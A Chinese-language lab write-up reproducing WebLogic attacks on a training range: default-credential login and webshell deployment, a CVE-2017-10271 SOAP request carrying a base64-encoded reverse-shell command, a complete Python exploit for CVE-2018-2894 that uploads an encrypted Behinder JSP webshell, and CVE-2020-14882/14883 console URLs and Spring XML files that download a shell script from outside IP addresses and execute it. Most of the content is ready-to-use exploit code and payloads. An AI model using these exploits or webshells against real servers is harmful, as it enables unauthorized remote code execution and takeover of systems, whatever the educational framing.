weblogic漏洞复现

Weblogic-WeakPasswd

0x00

发现一个weblogic

image-20240208210927335

搜索weblogic后台,直接查看console

image-20240208211447184

然后发现这个,尝试默认的密码

https://cirt.net/passwords?criteria=weblogic

发现密码是

账号:weblogic 密码:Oracle@123

image-20240208212502261

0x01

部署jar包

image-20240208212912182

image-20240208212937258

image-20240208213136034

image-20240208213507459

image-20240208213532934

上传成功

0x02

连接蚁剑

image-20240208213717165

CVE-2017-10271

使用的是蚁景的靶场，然后发现了弱口令……

image-20240208215503172

image-20240208215448841

0x00

发现了 WebLogic，然后进行扫描，发现漏洞。

image-20240208215846164

查看了10271 发现是一个

0x01

开启监听9999端口

0x02

尝试利用

抓一个包,修改成

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: http://target.yijinglab.com:58169/
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 668

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>
echo YmFzaCAtaSA+JiAvZGV2LcC84LjEzMC4xMjMuMjUvOTk5OSAYxIA==|base64 -d|bash -i</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

image-20240208222227441

利用成功

CVE-2018-2894

0x00

image-20240208234249671

还是一个Weblogic

0x01

直接利用CVE-2018-2894

使用exp

#!/usr/bin/env python
# coding:utf-8
# Build By LandGrey
# Modify By mingy

import re
import sys
import time
import argparse
import requests
import traceback
import xml.etree.ElementTree as ET


def get_current_work_path(host):
    """Return the work directory currently configured in the ws_utc settings.

    Requests ``<host>/ws_utc/resources/setting/options/general`` (the WebLogic
    Web Services Test Client configuration endpoint) and returns the first
    ``<defaultValue>`` text found under ``section/options/parameter``.

    Args:
        host: Base URL of the target, scheme included, without a trailing slash.

    Returns:
        The first ``defaultValue`` string parsed from the settings XML.

    Exits the process (via the ``exit`` builtin) on a 404, on a connection
    error, or when no ``defaultValue`` could be parsed from the response.

    Defender note: the exposure this relies on is the test-client settings
    endpoint answering without authentication; Oracle's advisory for
    CVE-2018-2894 is the reference for the fix -- confirm the production-mode
    "Enable Web Service Test Page" setting against it.
    """
    geturl = f"{host}/ws_utc/resources/setting/options/general"
    ua = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0'}
    values = []
    try:
        # NOTE(review): the first request deliberately omits ``ua``; only the
        # retry below sends it.
        request = requests.get(geturl)
        if request.status_code == 404:
            exit(f"[-] {host} don't exists CVE-2018-2894")
        elif "Deploying Application".lower() in request.text.lower():
            # The application is still being deployed on first access: wait and retry once.
            print("[*] First Deploying Website Please wait a moment ...")
            time.sleep(20)
            request = requests.get(geturl, headers=ua)
        if "</defaultValue>" in request.content.decode():
            root = ET.fromstring(request.content)
            value = root.find("section").find("options")
            # Collect every <defaultValue> text that sits under a <parameter> element.
            for e in value:
                values.extend(
                    sub.text
                    for sub in e
                    if e.tag == "parameter" and sub.tag == "defaultValue"
                )
    except requests.ConnectionError:
        exit(f"[-] Cannot connect url: {geturl}")
    if values:
        return values[0]
    print("[-] Cannot get current work path\n")
    # Dump the raw body so the caller can see why parsing failed.
    exit(request.content)


def get_new_work_path(host):
    """Derive the new work directory to configure, based on the current one.

    Reads the current work dir through ``get_current_work_path`` and, when it
    contains ``user_projects``, rebuilds it as
    ``<prefix>user_projects/domains/<domain>`` followed by the fixed
    ``works`` suffix.  Backslash paths are handled with ``\\`` as separator,
    all other paths with ``/``.

    Args:
        host: Base URL of the target, scheme included, without a trailing slash.

    Returns:
        The rebuilt path, or the original path unchanged (after printing a
        warning) when ``user_projects`` is not part of it.
    """
    origin_work_path = get_current_work_path(host)
    # NOTE(review): the ``4mcj4y`` component is taken as-is from the original
    # script; it may not match other installs -- verify on the target.
    works = "/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css"
    if "user_projects" in origin_work_path:
        if "\\" in origin_work_path:
            # Backslash-separated path: use the same separator in the suffix.
            works = works.replace("/", "\\")
            current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects\\domains"
            # The domain name is the path component right after ``user_projects\domains``.
            dir_len = len(current_work_home.split("\\"))
            domain_name = origin_work_path.split("\\")[dir_len]
            current_work_home += "\\" + domain_name + works
        else:
            current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects/domains"
            # Same component arithmetic as above, with ``/`` as separator.
            dir_len = len(current_work_home.split("/"))
            domain_name = origin_work_path.split("/")[dir_len]
            current_work_home += f"/{domain_name}{works}"
    else:
        # Unrecognised layout: pass the original path through unchanged.
        current_work_home = origin_work_path
        print(f"[*] cannot handle current work home dir: {current_work_home}")
    return current_work_home


def set_new_upload_path(host, path):
    """Post the ws_utc "general" settings with ``workDir`` set to *path*.

    Uses the module-level ``headers`` dict defined in the ``__main__`` block.

    Args:
        host: Base URL of the target, scheme included, without a trailing slash.
        path: Value to submit as ``BasicConfigOptions.workDir``.

    Returns:
        True when the response body contains "successfully".

    Exits the process with the raw response body otherwise.

    Defender note: a POST to ``/ws_utc/resources/setting/options`` that changes
    ``BasicConfigOptions.workDir`` is a concrete request pattern to alert on.
    """
    data = {
        "setting_id": "general",
        "BasicConfigOptions.workDir": path,
        "BasicConfigOptions.proxyHost": "",
        "BasicConfigOptions.proxyPort": "80"}
    request = requests.post(f"{host}/ws_utc/resources/setting/options", data=data, headers=headers)
    if "successfully" in request.content.decode():
        return True
    print("[-] Change New Upload Path failed")
    exit(request.content)


def upload_webshell(host, uri):
    """Upload a JSP file through the keystore endpoint and check it is served.

    First points the ws_utc work dir at the path from ``get_new_work_path``,
    then posts a multipart form to ``host + uri`` and reads the last ``<id>``
    from the reply.  The file is then fetched from
    ``<host>/ws_utc/css/config/keystore/<id>_test.jsp`` and considered present
    when the body contains "test" (the JSP in ``upload_content`` prints that
    string).

    Relies on the module-level ``password``, ``upload_content`` and ``headers``
    defined in the ``__main__`` block.

    Args:
        host: Base URL of the target, scheme included, without a trailing slash.
        uri: Keystore upload path, ``/ws_utc/resources/setting/keystore`` in ``__main__``.

    Returns:
        None; the outcome is only printed.

    Defender note: new ``<number>_*.jsp`` files under ``ws_utc/css/config/keystore/``
    are the on-disk artifact of this technique.
    """
    set_new_upload_path(host, get_new_work_path(host))
    files = {
        "ks_edit_mode": "false",
        "ks_password_front": password,
        "ks_password_changed": "true",
        "ks_filename": ("test.jsp", upload_content)
    }

    request = requests.post(host + uri, files=files)
    response = request.text
    # The server echoes the stored entry id; the last one belongs to this upload.
    if match := re.findall("<id>(.*?)</id>", response):
        tid = match[-1]
        shell_path = f"{host}/ws_utc/css/config/keystore/{str(tid)}_test.jsp"
        if "test" in requests.get(shell_path, headers=headers).content.decode():
            print(f"[+] {host} exists CVE-2018-2894")
            print(f"[+] Check URL: {shell_path} ")
        else:
            print(f"[-] {host} don't exists CVE-2018-2894")
    else:
        print(f"[-] {host} don't exists CVE-2018-2894")


if __name__ == "__main__":
    # Script entry point: parse ``-t``, normalise the target URL and run the check.
    start = time.time()
    # Module-level values read by set_new_upload_path / upload_webshell above.
    password = "test"
    url = "/ws_utc/resources/setting/keystore"
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", dest='target', default="http://127.0.0.1:7001", type=str,
                        help="target, such as: http://example.com:7001")

    # write into behinder default jsp webshell
    # (the trailing out.println("test") is what upload_webshell looks for)
    upload_content = '<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%><%out.println("test");%>'
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Requested-With': 'XMLHttpRequest', }

    # With no arguments, show the help text instead of hitting the default target.
    if len(sys.argv) == 1:
        sys.argv.append('-h')
    args = parser.parse_args()
    target = args.target

    # Normalise: drop a trailing slash and default to http:// when no scheme is given.
    target = target.rstrip('/')
    if "://" not in target:
        target = f"http://{target}"
    try:
        upload_webshell(target, url)
    except Exception as e:
        # Catch-all at the top level so the traceback is printed rather than lost.
        print("[-] Error: \n")
        traceback.print_exc()

image-20240208234359536

使用冰蝎连接

密码是rebeyond

image-20240208234647328

CVE-2020-14882

这个漏洞需要联动CVE-2020-14883

CVE-2020-14882 是一个未授权访问漏洞

CVE-2020-14883 可以反弹shell

0x00

准备shell.sh文件

image-20240208235749993

然后开启http 监听服务

0x01

使用请求下载文件

http://target.yijinglab.com:50756/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec (‘curl http://8.130.123.25:8000/shell.sh -o /tmp/shell.sh’);”)

image-20240209000255712

下载成功

执行文件

http://target.yijinglab.com:50756/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('/bin/bash /tmp/shell.sh');")

执行成功

image-20240209000454392

反弹shell

0x02

还可以尝试使用 XML 下载文件，因为 WebLogic 会解析 XML。

download.xml

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[curl 139.155.49.43:8000/shell.sh -o /tmp/shell.sh]]></value>
</list>
</constructor-arg>
</bean>
</beans>

runshell.xml

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[bash /tmp/shell.sh]]></value>
</list>
</constructor-arg>
</bean>
</beans>

下载文件

http://192.168.79.128:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(“http://8.130.123.25:8000/download.xml“)

image-20240209001047734

执行文件

http://target.yijinglab.com:50756/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://8.130.123.25:8000/runshell.xml")

image-20240209001157563

成功反弹shell

